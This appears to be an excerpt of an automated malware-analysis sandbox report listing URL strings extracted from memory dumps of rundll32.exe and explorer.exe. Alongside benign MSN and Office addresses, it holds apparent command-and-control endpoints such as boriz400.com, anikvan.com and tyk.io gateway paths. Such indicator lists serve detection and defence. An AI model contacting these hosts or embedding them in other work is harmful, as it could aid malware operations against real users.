Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/content.phpGf
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/d
Source: rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/db-53011b87bd06
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/ic
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000016.00000000.1845325737.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2938934418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/
Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921159E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/api/azure
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/api/azure8
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/api/azurey
Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/content.php
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/qa
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000016.00000002.2945125604.000000000B4AE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://illoskanawer.com/live/
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/
Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure
Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php
Source: rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4
Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA
Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL
Source: rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF
Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/
Source: rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/5/
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/F
Source: rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure
Source: rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(
Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure/j
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azureY
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurej
Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php
Source: rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j
Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep://www.
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php
Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j
Source: rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php(
Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j
